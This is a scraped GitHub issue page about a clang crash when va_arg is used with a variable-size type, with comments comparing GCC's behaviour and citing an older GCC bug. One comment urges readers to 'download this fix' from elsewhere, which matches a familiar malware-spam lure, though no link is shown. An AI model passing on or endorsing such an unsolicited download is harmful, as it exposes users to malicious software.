-
Notifications
You must be signed in to change notification settings - Fork 13.3k
Crash on va_arg with variable size type #106174
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
to fix your trouble try download this fix, i see it in another issue, |
@llvm/issue-subscribers-clang-codegen Author: Herman Narkaytis (hnarkaytis)
x86-64 clang (trunk)
PLEASE submit a bug report to https://github.com/llvm/llvm-project/issues/ and include the crash backtrace, preprocessed source, and associated run script.
|
gcc errors out on this: https://godbolt.org/z/nsj8K448P but ICEs in C mode: https://godbolt.org/z/57doW63We |
GCC has this issue since 2020 https://gcc.gnu.org/bugzilla/show_bug.cgi?id=97986 |
x86-64 clang (trunk)
The text was updated successfully, but these errors were encountered: